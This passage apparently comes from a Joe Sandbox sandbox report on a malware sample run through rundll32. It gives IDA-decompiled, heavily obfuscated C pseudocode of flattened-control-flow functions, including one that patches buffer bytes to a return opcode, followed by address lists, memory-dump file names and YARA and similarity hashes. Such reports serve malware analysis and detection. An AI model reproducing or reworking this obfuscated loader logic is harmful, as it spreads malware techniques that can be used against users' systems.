				_v652 = _v652 / _t189;
				_v652 = _v652 ^ 0x08c5a62f;
				_v616 = 0xf4782f;
				_v616 = _v616 >> 0xa;
				_v616 = _v616 + 0xffff066a;
				_v616 = _v616 ^ 0xfff8c7bc;
				_v604 = 0x656560;
				_v604 = _v604 >> 3;
				_v604 = _v604 ^ 0x0000606f;
				_v648 = 0x377d9b;
				_t190 = 0x7f;
				_v648 = _v648 / _t190;
				_v648 = _v648 + 0xfd7f;
				_v648 = _v648 + 0xffff6b0a;
				_v648 = _v648 ^ 0x00006649;
				_v636 = 0x80cedd;
				_t191 = 0x58;
				_v636 = _v636 / _t191;
				_v636 = _v636 + 0x515e;
				_v636 = _v636 ^ 0x000b92de;
				_v620 = 0x65d9bd;
				_v620 = _v620 + 0xffff4b50;
				_v620 = _v620 ^ 0xd34cfccc;
				_v620 = _v620 ^ 0xd32e4bd2;
				_v632 = 0xb89e86;
				_v632 = _v632 + 0xffffcc79;
				_t192 = 0x2f;
				_v632 = _v632 / _t192;
				_v632 = _v632 ^ 0x00046a67;
				_v628 = 0xbb1c4a;
				_v628 = _v628 >> 6;
				_v628 = _v628 >> 9;
				_v628 = _v628 ^ 0x000a4ee8;
				_v640 = 0xfd7114;
				_v640 = _v640 << 5;
				_v640 = _v640 * 0x45;
				_v640 = _v640 + 0xa2ea;
				_v640 = _v640 ^ 0x89e0c310;
				_v612 = 0x26e293;
				_v612 = _v612 >> 0xd;
				_v612 = _v612 ^ 0x00050986;
				_t193 = _v612;
				do {
					while(_t162 != 0x249e110) {
						if(_t162 == 0x48c9d54) {
							_v556 = 0x22c;
							_t153 = E002DC15D(_t193, _v652, _v616,  &_v556, _v604);
							_t196 =  &(_t196[3]);
							asm("sbb ecx, ecx");
							_t167 =  ~_t153 & 0xf758a92f;
							L13:
							_t162 = _t167 + 0xe63f1a5;
							continue;
						}
						if(_t162 == 0x5bc9ad4) {
							_t156 = E002C8E4D( &_v556,  &_v600);
							asm("sbb ecx, ecx");
							_t167 =  ~_t156 & 0xf3e5ef6b;
							goto L13;
						}
						if(_t162 == 0xac58df2) {
							_v576 = _t187;
							_t162 = 0xcf1a497;
							continue;
						}
						if(_t162 != 0xcf1a497) {
							if(_t162 == 0xe63f1a5) {
								return E002D1E67(_v632, _v628, _v640, _v612, _t193);
							}
							goto L18;
						}
						_push(_t162);
						_t156 = E002C5988(_t162, _v608);
						_t193 = _t156;
						if(_t156 != 0xffffffff) {
							_t162 = 0x48c9d54;
							continue;
						}
						L8:
						return _t156;
					}
					_t151 = E002C2A58(_v648, _t193,  &_v556, _v636, _v620);
					_t196 =  &(_t196[3]);
					if(_t151 == 0) {
						_t162 = 0xe63f1a5;
						goto L18;
					} else {
						_t162 = 0x5bc9ad4;
						continue;
					}
					goto L8;
					L18:
				} while (_t162 != 0xad68edc);
				return _t156;
			}

































                                                                                                                                    0x002ce2d6
                                                                                                                                    0x002ce2dd
                                                                                                                                    0x002ce2e4
                                                                                                                                    0x002ce2e5
                                                                                                                                    0x002ce2ea
                                                                                                                                    0x002ce2ec
                                                                                                                                    0x002ce2f1
                                                                                                                                    0x002ce2f9
                                                                                                                                    0x002ce2fc
                                                                                                                                    0x002ce306
                                                                                                                                    0x002ce30e
                                                                                                                                    0x002ce313
                                                                                                                                    0x002ce31b
                                                                                                                                    0x002ce322
                                                                                                                                    0x002ce325
                                                                                                                                    0x002ce331
                                                                                                                                    0x002ce335
                                                                                                                                    0x002ce33d
                                                                                                                                    0x002ce345
                                                                                                                                    0x002ce34d
                                                                                                                                    0x002ce355
                                                                                                                                    0x002ce359
                                                                                                                                    0x002ce361
                                                                                                                                    0x002ce369
                                                                                                                                    0x002ce36e
                                                                                                                                    0x002ce37a
                                                                                                                                    0x002ce37f
                                                                                                                                    0x002ce385
                                                                                                                                    0x002ce38d
                                                                                                                                    0x002ce395
                                                                                                                                    0x002ce39a
                                                                                                                                    0x002ce3a2
                                                                                                                                    0x002ce3aa
                                                                                                                                    0x002ce3b2
                                                                                                                                    0x002ce3b7
                                                                                                                                    0x002ce3bf
                                                                                                                                    0x002ce3cb
                                                                                                                                    0x002ce3d0
                                                                                                                                    0x002ce3d6
                                                                                                                                    0x002ce3de
                                                                                                                                    0x002ce3e6
                                                                                                                                    0x002ce3ee
                                                                                                                                    0x002ce3fa
                                                                                                                                    0x002ce3ff
                                                                                                                                    0x002ce405
                                                                                                                                    0x002ce40d
                                                                                                                                    0x002ce415
                                                                                                                                    0x002ce41d
                                                                                                                                    0x002ce425
                                                                                                                                    0x002ce42d
                                                                                                                                    0x002ce435
                                                                                                                                    0x002ce43d
                                                                                                                                    0x002ce449
                                                                                                                                    0x002ce44c
                                                                                                                                    0x002ce450
                                                                                                                                    0x002ce458
                                                                                                                                    0x002ce460
                                                                                                                                    0x002ce46a
                                                                                                                                    0x002ce474
                                                                                                                                    0x002ce47c
                                                                                                                                    0x002ce484
                                                                                                                                    0x002ce48e
                                                                                                                                    0x002ce492
                                                                                                                                    0x002ce49a
                                                                                                                                    0x002ce4a2
                                                                                                                                    0x002ce4aa
                                                                                                                                    0x002ce4af
                                                                                                                                    0x002ce4b7
                                                                                                                                    0x002ce4bb
                                                                                                                                    0x002ce4bb
                                                                                                                                    0x002ce4c9
                                                                                                                                    0x002ce56a
                                                                                                                                    0x002ce57d
                                                                                                                                    0x002ce582
                                                                                                                                    0x002ce589
                                                                                                                                    0x002ce58b
                                                                                                                                    0x002ce55b
                                                                                                                                    0x002ce55b
                                                                                                                                    0x00000000
                                                                                                                                    0x002ce55b
                                                                                                                                    0x002ce4d5
                                                                                                                                    0x002ce54a
                                                                                                                                    0x002ce553
                                                                                                                                    0x002ce555
                                                                                                                                    0x00000000
                                                                                                                                    0x002ce555
                                                                                                                                    0x002ce4dd
                                                                                                                                    0x002ce532
                                                                                                                                    0x002ce536
                                                                                                                                    0x00000000
                                                                                                                                    0x002ce536
                                                                                                                                    0x002ce4e5
                                                                                                                                    0x002ce4e9
                                                                                                                                    0x00000000
                                                                                                                                    0x002ce505
                                                                                                                                    0x00000000
                                                                                                                                    0x002ce4e9
                                                                                                                                    0x002ce51b
                                                                                                                                    0x002ce520
                                                                                                                                    0x002ce525
                                                                                                                                    0x002ce52c
                                                                                                                                    0x002ce52e
                                                                                                                                    0x00000000
                                                                                                                                    0x002ce52e
                                                                                                                                    0x002ce512
                                                                                                                                    0x002ce512
                                                                                                                                    0x002ce512
                                                                                                                                    0x002ce5a6
                                                                                                                                    0x002ce5ab
                                                                                                                                    0x002ce5b0
                                                                                                                                    0x002ce5bc
                                                                                                                                    0x00000000
                                                                                                                                    0x002ce5b2
                                                                                                                                    0x002ce5b2
                                                                                                                                    0x00000000
                                                                                                                                    0x002ce5b2
                                                                                                                                    0x00000000
                                                                                                                                    0x002ce5be
                                                                                                                                    0x002ce5be
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: If$R5C$^Q$`ee$f~8$o`$N
                                                                                                                                    • API String ID: 0-3572798563
                                                                                                                                    • Opcode ID: f51eb1b3559e1626032a78683ad6bcfe271b73ad5206c5b249aa3128532c0a43
                                                                                                                                    • Instruction ID: 174ccdd89fd5b6e1dff838865c9053032afb7e360af129200358bce2a71127cb
                                                                                                                                    • Opcode Fuzzy Hash: f51eb1b3559e1626032a78683ad6bcfe271b73ad5206c5b249aa3128532c0a43
                                                                                                                                    • Instruction Fuzzy Hash: 867186B2518301DFC768CF22C88995FBBE1EBC4768F504A1DF486962A0D775CA19CF82
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10014B71 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _strcpy_s.LIBCMT ref: 10014B9E
                                                                                                                                      • Part of subcall function 100311F4: __getptd_noexit.LIBCMT ref: 100311F4
                                                                                                                                    • __snprintf_s.LIBCMT ref: 10014BD7
                                                                                                                                      • Part of subcall function 1003119A: __vsnprintf_s_l.LIBCMT ref: 100311AF
                                                                                                                                    • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 10014C02
                                                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 10014C25
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InfoLibraryLoadLocale__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
                                                                                                                                    • String ID: LOC
                                                                                                                                    • API String ID: 3864805678-519433814
                                                                                                                                    • Opcode ID: 993ef955d11e1d056c0da4e243e940ae0abcf9c49e17b7ca6a81ba24efbb4c92
                                                                                                                                    • Instruction ID: c6b9acf05ba5f485c5c472c95a6cc1a1d49ea65b07ecc8430683ae88ba63382e
                                                                                                                                    • Opcode Fuzzy Hash: 993ef955d11e1d056c0da4e243e940ae0abcf9c49e17b7ca6a81ba24efbb4c92
                                                                                                                                    • Instruction Fuzzy Hash: B011E471900118AFDB11DB64CC86BDD73B8EF09315F1241A1F7059F0A1EEB0E9859AD1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002CCF47 Relevance: 7.9, Strings: 6, Instructions: 380COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                    			E002CCF47(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20) {
				char _v32;
				intOrPtr _v40;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v88;
				char* _v92;
				char _v112;
				char _v120;
				intOrPtr _v124;
				char _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				void* _t345;
				void* _t377;
				void* _t378;
				void* _t386;
				void* _t393;
				intOrPtr _t403;
				intOrPtr* _t406;
				void* _t408;
				signed char* _t414;
				signed char* _t450;
				intOrPtr* _t455;
				intOrPtr _t456;
				intOrPtr _t457;
				void* _t458;
				signed char* _t459;
				signed int _t460;
				signed int _t461;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t465;
				signed int _t466;
				signed int _t467;
				signed int _t468;
				signed int _t469;
				void* _t470;
				void* _t471;
				void* _t474;

				_t406 = _a8;
				_t456 = _a4;
				_push(_a20);
				_t455 = _a16;
				_push(_t455);
				_push(_a12);
				_push(_t406);
				_push(_t456);
				_push(__edx);
				_push(__ecx);
				E002D20B9(_t345);
				_v256 = 0xcf1dac;
				_t471 = _t470 + 0x1c;
				_v256 = _v256 ^ 0x662b1d0f;
				_v256 = _v256 << 2;
				_t408 = 0x8e80a37;
				_v256 = _v256 + 0xffff9089;
				_v256 = _v256 ^ 0x9b8f9315;
				_v160 = 0x25617a;
				_v160 = _v160 << 2;
				_v160 = _v160 ^ 0x009585a8;
				_v264 = 0x39e017;
				_v264 = _v264 + 0xffffbc9c;
				_v264 = _v264 ^ 0xb11c7ead;
				_v264 = _v264 + 0xffffd7b2;
				_v264 = _v264 ^ 0xb125b990;
				_v240 = 0xb82586;
				_t460 = 0x74;
				_v240 = _v240 / _t460;
				_v240 = _v240 << 1;
				_t461 = 0x3b;
				_v132 = _v132 & 0x00000000;
				_v240 = _v240 * 0x36;
				_v240 = _v240 ^ 0x00aace1a;
				_v180 = 0xcab8fe;
				_v180 = _v180 ^ 0xca9451c5;
				_v180 = _v180 | 0x3e03c42f;
				_v180 = _v180 ^ 0xfe5c53ad;
				_v248 = 0x57862;
				_v248 = _v248 | 0x3f7dcfba;
				_v248 = _v248 / _t461;
				_t462 = 0x62;
				_v248 = _v248 / _t462;
				_v248 = _v248 ^ 0x00057d9a;
				_v252 = 0x68f561;
				_v252 = _v252 << 6;
				_v252 = _v252 >> 0xd;
				_v252 = _v252 | 0x3cddc102;
				_v252 = _v252 ^ 0x3cda88f2;
				_v192 = 0x7c8e99;
				_v192 = _v192 + 0x829c;
				_v192 = _v192 * 0x31;
				_v192 = _v192 ^ 0x17fda794;
				_v228 = 0x74d91a;
				_v228 = _v228 << 3;
				_v228 = _v228 + 0x7502;
				_v228 = _v228 * 0x63;
				_v228 = _v228 ^ 0x69a7ce60;
				_v208 = 0xc909ae;
				_v208 = _v208 << 1;
				_t463 = 0xb;
				_v208 = _v208 / _t463;
				_v208 = _v208 ^ 0x00276772;
				_v164 = 0x673800;
				_v164 = _v164 << 9;
				_v164 = _v164 ^ 0xce7e8a93;
				_v232 = 0xb859bd;
				_v232 = _v232 + 0xde76;
				_t464 = 0x5b;
				_v232 = _v232 * 0x1c;
				_v232 = _v232 * 0x30;
				_v232 = _v232 ^ 0xcc63b0a7;
				_v172 = 0x7eda56;
				_v172 = _v172 << 3;
				_v172 = _v172 ^ 0x03f50911;
				_v184 = 0x2f7891;
				_v184 = _v184 / _t464;
				_t465 = 0x41;
				_v184 = _v184 * 0x49;
				_v184 = _v184 ^ 0x0024fbf7;
				_v148 = 0x4a0bea;
				_v148 = _v148 ^ 0x502016f1;
				_v148 = _v148 ^ 0x506ad42a;
				_v260 = 0x9ebd58;
				_v260 = _v260 >> 8;
				_v260 = _v260 << 0xf;
				_v260 = _v260 + 0xb306;
				_v260 = _v260 ^ 0x4f54a3e8;
				_v204 = 0xce3506;
				_v204 = _v204 << 0xf;
				_v204 = _v204 << 0xc;
				_v204 = _v204 ^ 0x300ddb73;
				_v244 = 0xe7c592;
				_v244 = _v244 >> 5;
				_v244 = _v244 ^ 0x506a7775;
				_v244 = _v244 << 1;
				_v244 = _v244 ^ 0xa0d2afa7;
				_v268 = 0x1d8a79;
				_v268 = _v268 << 2;
				_v268 = _v268 / _t465;
				_v268 = _v268 | 0x253986a4;
				_v268 = _v268 ^ 0x2531568a;
				_v216 = 0x116531;
				_t466 = 0x61;
				_v216 = _v216 * 0x66;
				_v216 = _v216 ^ 0xfffdc9ed;
				_v216 = _v216 ^ 0xf917010b;
				_v200 = 0xc05f9c;
				_v200 = _v200 / _t466;
				_v200 = _v200 * 0x6f;
				_v200 = _v200 ^ 0x00dca3d1;
				_v212 = 0xdb89ea;
				_v212 = _v212 >> 0xa;
				_v212 = _v212 >> 9;
				_v212 = _v212 ^ 0x0000ad8d;
				_v152 = 0x38fb70;
				_v152 = _v152 ^ 0x310cc67b;
				_v152 = _v152 ^ 0x313af23a;
				_v136 = 0x7e2008;
				_v136 = _v136 ^ 0x7ad3030b;
				_v136 = _v136 ^ 0x7aaaa86e;
				_v196 = 0x9c4278;
				_t467 = 0x4e;
				_v196 = _v196 * 0x7e;
				_v196 = _v196 ^ 0xa26962db;
				_v196 = _v196 ^ 0xee89d9da;
				_v220 = 0x1e88f4;
				_v220 = _v220 >> 4;
				_v220 = _v220 >> 7;
				_v220 = _v220 ^ 0x000c14cc;
				_v140 = 0xc2e6ba;
				_v140 = _v140 + 0x8875;
				_v140 = _v140 ^ 0x00c43ba1;
				_v188 = 0xdb74c;
				_v188 = _v188 << 4;
				_v188 = _v188 * 0x5c;
				_v188 = _v188 ^ 0x4edda20a;
				_v236 = 0x62ea5;
				_v236 = _v236 / _t467;
				_v236 = _v236 >> 0xb;
				_v236 = _v236 ^ 0x7372adb3;
				_v236 = _v236 ^ 0x73757ff2;
				_v144 = 0x2b6271;
				_v144 = _v144 ^ 0x1ac7dce1;
				_v144 = _v144 ^ 0x1ae73668;
				_v224 = 0x8bb898;
				_v224 = _v224 + 0x43a9;
				_v224 = _v224 << 0x10;
				_t468 = 0x71;
				_t469 = _v132;
				_v224 = _v224 / _t468;
				_v224 = _v224 ^ 0x023712cd;
				_v156 = 0xb23c07;
				_v156 = _v156 + 0x4ded;
				_v156 = _v156 ^ 0x00b7ca1c;
				_v168 = 0xb501ce;
				_v168 = _v168 ^ 0x6706c67f;
				_v168 = _v168 ^ 0x67b3c7a1;
				_v176 = 0xab8984;
				_v176 = _v176 * 0x22;
				_v176 = _v176 ^ 0x16c84308;
				goto L1;
				do {
					while(1) {
						L1:
						_t474 = _t408 - 0xd9acfaa;
						if(_t474 > 0) {
							break;
						}
						if(_t474 == 0) {
							E002D8519(_v236, _v144, _v128);
							_t408 = 0xfbb751f;
							continue;
						}
						if(_t408 == 0x15a913b) {
							_v40 = _t456;
							_v92 =  &_v32;
							_v56 =  *_t455;
							_v52 =  *((intOrPtr*)(_t455 + 4));
							_v88 = 0x20;
							_t393 = E002C7735(_v192,  &_v112,  &_v120, _v228, _v208);
							_t471 = _t471 + 0x10;
							if(_t393 == 0) {
								L20:
								return _v132;
							}
							_t408 = 0xf0a856e;
							continue;
						}
						if(_t408 == 0x3749e66) {
							_t469 = E002D0AE0(_v176, _v168);
							_t408 = 0x46acfc9;
							 *((intOrPtr*)(_t406 + 4)) = _v160 + _v124 + _t469;
							continue;
						}
						if(_t408 == 0x46acfc9) {
							_push(_t408);
							_push(_t408);
							_t403 = E002C7FF2( *((intOrPtr*)(_t406 + 4)));
							 *_t406 = _t403;
							if(_t403 == 0) {
								_t408 = 0xd9acfaa;
							} else {
								_v132 = 1;
								_t408 = 0xfb3baa2;
							}
							continue;
						}
						if(_t408 != 0x8e80a37) {
							goto L31;
						}
						_t408 = 0xfac38db;
					}
					if(_t408 == 0xf0a856e) {
						_t377 = E002C70B3(_v164,  &_v128,  &_v120, _v232, _v172);
						_t471 = _t471 + 0xc;
						if(_t377 == 0) {
							_t408 = 0xfbb751f;
							goto L31;
						}
						_t408 = 0x3749e66;
						goto L1;
					}
					if(_t408 == 0xfac38db) {
						_push( *_t455);
						_t378 = E002DAE6D(_v240,  &_v32,  *((intOrPtr*)(_t455 + 4)), _v180, _t408, _v248);
						_t471 = _t471 + 0x14;
						if(_t378 == 0) {
							goto L20;
						}
						_t408 = 0x15a913b;
						goto L1;
					}
					if(_t408 == 0xfb3baa2) {
						_t457 =  *_t406;
						E002C7E87(_v268, _v216, _v200, _t457);
						_t458 = _t457 + _v264;
						E002CED7E(_v212, _t458, _v152, _v128, _v124);
						_t459 = _t458 + _v124;
						E002CA492(_v196, _v220, _t459, _t469);
						_t450 =  &(_t459[_t469]);
						_t471 = _t471 + 0x20;
						_t414 = _t459;
						if(_t459 >= _t450) {
							L25:
							_t386 = E002D0AE0(0xe, 0);
							_t408 = 0xd9acfaa;
							 *((char*)(_t386 + _t459)) = 0;
							_t456 = _a4;
							goto L1;
						} else {
							goto L22;
						}
						do {
							L22:
							if(( *_t414 & 0x000000ff) == _v256) {
								 *_t414 = 0xc3;
							}
							_t414 =  &(_t414[1]);
						} while (_t414 < _t450);
						goto L25;
					}
					if(_t408 != 0xfbb751f) {
						goto L31;
					}
					E002D8519(_v224, _v156, _v120);
					goto L20;
					L31:
				} while (_t408 != 0x5927677);
				goto L20;
			}












































































                                                                                                                                    0x002ccf4e
                                                                                                                                    0x002ccf57
                                                                                                                                    0x002ccf5f
                                                                                                                                    0x002ccf66
                                                                                                                                    0x002ccf6d
                                                                                                                                    0x002ccf6e
                                                                                                                                    0x002ccf75
                                                                                                                                    0x002ccf76
                                                                                                                                    0x002ccf77
                                                                                                                                    0x002ccf78
                                                                                                                                    0x002ccf79
                                                                                                                                    0x002ccf7e
                                                                                                                                    0x002ccf86
                                                                                                                                    0x002ccf89
                                                                                                                                    0x002ccf93
                                                                                                                                    0x002ccf98
                                                                                                                                    0x002ccf9d
                                                                                                                                    0x002ccfa5
                                                                                                                                    0x002ccfad
                                                                                                                                    0x002ccfb8
                                                                                                                                    0x002ccfc0
                                                                                                                                    0x002ccfcb
                                                                                                                                    0x002ccfd3
                                                                                                                                    0x002ccfdb
                                                                                                                                    0x002ccfe3
                                                                                                                                    0x002ccfeb
                                                                                                                                    0x002ccff3
                                                                                                                                    0x002cd001
                                                                                                                                    0x002cd006
                                                                                                                                    0x002cd00c
                                                                                                                                    0x002cd015
                                                                                                                                    0x002cd018
                                                                                                                                    0x002cd020
                                                                                                                                    0x002cd024
                                                                                                                                    0x002cd02c
                                                                                                                                    0x002cd034
                                                                                                                                    0x002cd03c
                                                                                                                                    0x002cd044
                                                                                                                                    0x002cd04c
                                                                                                                                    0x002cd054
                                                                                                                                    0x002cd064
                                                                                                                                    0x002cd06c
                                                                                                                                    0x002cd06f
                                                                                                                                    0x002cd073
                                                                                                                                    0x002cd07b
                                                                                                                                    0x002cd083
                                                                                                                                    0x002cd088
                                                                                                                                    0x002cd08d
                                                                                                                                    0x002cd095
                                                                                                                                    0x002cd09d
                                                                                                                                    0x002cd0a5
                                                                                                                                    0x002cd0b2
                                                                                                                                    0x002cd0b6
                                                                                                                                    0x002cd0be
                                                                                                                                    0x002cd0c6
                                                                                                                                    0x002cd0cb
                                                                                                                                    0x002cd0d8
                                                                                                                                    0x002cd0dc
                                                                                                                                    0x002cd0e4
                                                                                                                                    0x002cd0ec
                                                                                                                                    0x002cd0f8
                                                                                                                                    0x002cd0fd
                                                                                                                                    0x002cd103
                                                                                                                                    0x002cd10b
                                                                                                                                    0x002cd116
                                                                                                                                    0x002cd11e
                                                                                                                                    0x002cd129
                                                                                                                                    0x002cd131
                                                                                                                                    0x002cd13e
                                                                                                                                    0x002cd141
                                                                                                                                    0x002cd14a
                                                                                                                                    0x002cd14e
                                                                                                                                    0x002cd156
                                                                                                                                    0x002cd15e
                                                                                                                                    0x002cd163
                                                                                                                                    0x002cd16b
                                                                                                                                    0x002cd17b
                                                                                                                                    0x002cd184
                                                                                                                                    0x002cd187
                                                                                                                                    0x002cd18b
                                                                                                                                    0x002cd193
                                                                                                                                    0x002cd19e
                                                                                                                                    0x002cd1a9
                                                                                                                                    0x002cd1b4
                                                                                                                                    0x002cd1bc
                                                                                                                                    0x002cd1c1
                                                                                                                                    0x002cd1c6
                                                                                                                                    0x002cd1ce
                                                                                                                                    0x002cd1d6
                                                                                                                                    0x002cd1de
                                                                                                                                    0x002cd1e3
                                                                                                                                    0x002cd1e8
                                                                                                                                    0x002cd1f0
                                                                                                                                    0x002cd1f8
                                                                                                                                    0x002cd1fd
                                                                                                                                    0x002cd205
                                                                                                                                    0x002cd209
                                                                                                                                    0x002cd211
                                                                                                                                    0x002cd219
                                                                                                                                    0x002cd226
                                                                                                                                    0x002cd22a
                                                                                                                                    0x002cd232
                                                                                                                                    0x002cd23a
                                                                                                                                    0x002cd247
                                                                                                                                    0x002cd248
                                                                                                                                    0x002cd24c
                                                                                                                                    0x002cd254
                                                                                                                                    0x002cd25c
                                                                                                                                    0x002cd26a
                                                                                                                                    0x002cd273
                                                                                                                                    0x002cd277
                                                                                                                                    0x002cd27f
                                                                                                                                    0x002cd287
                                                                                                                                    0x002cd28c
                                                                                                                                    0x002cd291
                                                                                                                                    0x002cd299
                                                                                                                                    0x002cd2a4
                                                                                                                                    0x002cd2af
                                                                                                                                    0x002cd2ba
                                                                                                                                    0x002cd2c5
                                                                                                                                    0x002cd2d0
                                                                                                                                    0x002cd2db
                                                                                                                                    0x002cd2ec
                                                                                                                                    0x002cd2ef
                                                                                                                                    0x002cd2f3
                                                                                                                                    0x002cd2fb
                                                                                                                                    0x002cd303
                                                                                                                                    0x002cd30b
                                                                                                                                    0x002cd310
                                                                                                                                    0x002cd315
                                                                                                                                    0x002cd31d
                                                                                                                                    0x002cd328
                                                                                                                                    0x002cd333
                                                                                                                                    0x002cd33e
                                                                                                                                    0x002cd346
                                                                                                                                    0x002cd350
                                                                                                                                    0x002cd354
                                                                                                                                    0x002cd35c
                                                                                                                                    0x002cd36c
                                                                                                                                    0x002cd370
                                                                                                                                    0x002cd375
                                                                                                                                    0x002cd37d
                                                                                                                                    0x002cd385
                                                                                                                                    0x002cd390
                                                                                                                                    0x002cd39b
                                                                                                                                    0x002cd3a6
                                                                                                                                    0x002cd3ae
                                                                                                                                    0x002cd3b6
                                                                                                                                    0x002cd3bf
                                                                                                                                    0x002cd3c2
                                                                                                                                    0x002cd3c9
                                                                                                                                    0x002cd3cd
                                                                                                                                    0x002cd3d5
                                                                                                                                    0x002cd3e0
                                                                                                                                    0x002cd3eb
                                                                                                                                    0x002cd3f6
                                                                                                                                    0x002cd3fe
                                                                                                                                    0x002cd406
                                                                                                                                    0x002cd40e
                                                                                                                                    0x002cd41b
                                                                                                                                    0x002cd41f
                                                                                                                                    0x002cd41f
                                                                                                                                    0x002cd427
                                                                                                                                    0x002cd427
                                                                                                                                    0x002cd427
                                                                                                                                    0x002cd427
                                                                                                                                    0x002cd42d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002cd433
                                                                                                                                    0x002cd553
                                                                                                                                    0x002cd559
                                                                                                                                    0x00000000
                                                                                                                                    0x002cd559
                                                                                                                                    0x002cd43f
                                                                                                                                    0x002cd4e3
                                                                                                                                    0x002cd4f6
                                                                                                                                    0x002cd4ff
                                                                                                                                    0x002cd509
                                                                                                                                    0x002cd51f
                                                                                                                                    0x002cd52b
                                                                                                                                    0x002cd530
                                                                                                                                    0x002cd535
                                                                                                                                    0x002cd5a7
                                                                                                                                    0x002cd5b8
                                                                                                                                    0x002cd5b8
                                                                                                                                    0x002cd537
                                                                                                                                    0x00000000
                                                                                                                                    0x002cd537
                                                                                                                                    0x002cd44b
                                                                                                                                    0x002cd4b7
                                                                                                                                    0x002cd4cb
                                                                                                                                    0x002cd4d0
                                                                                                                                    0x00000000
                                                                                                                                    0x002cd4d0
                                                                                                                                    0x002cd453
                                                                                                                                    0x002cd477
                                                                                                                                    0x002cd478
                                                                                                                                    0x002cd479
                                                                                                                                    0x002cd47e
                                                                                                                                    0x002cd484
                                                                                                                                    0x002cd498
                                                                                                                                    0x002cd486
                                                                                                                                    0x002cd486
                                                                                                                                    0x002cd491
                                                                                                                                    0x002cd491
                                                                                                                                    0x00000000
                                                                                                                                    0x002cd484
                                                                                                                                    0x002cd45b
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002cd461
                                                                                                                                    0x002cd461
                                                                                                                                    0x002cd569
                                                                                                                                    0x002cd6ac
                                                                                                                                    0x002cd6b1
                                                                                                                                    0x002cd6b6
                                                                                                                                    0x002cd6c2
                                                                                                                                    0x00000000
                                                                                                                                    0x002cd6c2
                                                                                                                                    0x002cd6b8
                                                                                                                                    0x00000000
                                                                                                                                    0x002cd6b8
                                                                                                                                    0x002cd575
                                                                                                                                    0x002cd65b
                                                                                                                                    0x002cd674
                                                                                                                                    0x002cd679
                                                                                                                                    0x002cd67e
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002cd684
                                                                                                                                    0x00000000
                                                                                                                                    0x002cd684
                                                                                                                                    0x002cd581
                                                                                                                                    0x002cd5b9
                                                                                                                                    0x002cd5c8
                                                                                                                                    0x002cd5d1
                                                                                                                                    0x002cd5ee
                                                                                                                                    0x002cd5f3
                                                                                                                                    0x002cd60e
                                                                                                                                    0x002cd613
                                                                                                                                    0x002cd616
                                                                                                                                    0x002cd619
                                                                                                                                    0x002cd61d
                                                                                                                                    0x002cd630
                                                                                                                                    0x002cd63f
                                                                                                                                    0x002cd646
                                                                                                                                    0x002cd64b
                                                                                                                                    0x002cd64f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002cd61f
                                                                                                                                    0x002cd61f
                                                                                                                                    0x002cd626
                                                                                                                                    0x002cd628
                                                                                                                                    0x002cd628
                                                                                                                                    0x002cd62b
                                                                                                                                    0x002cd62c
                                                                                                                                    0x00000000
                                                                                                                                    0x002cd61f
                                                                                                                                    0x002cd589
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002cd5a1
                                                                                                                                    0x00000000
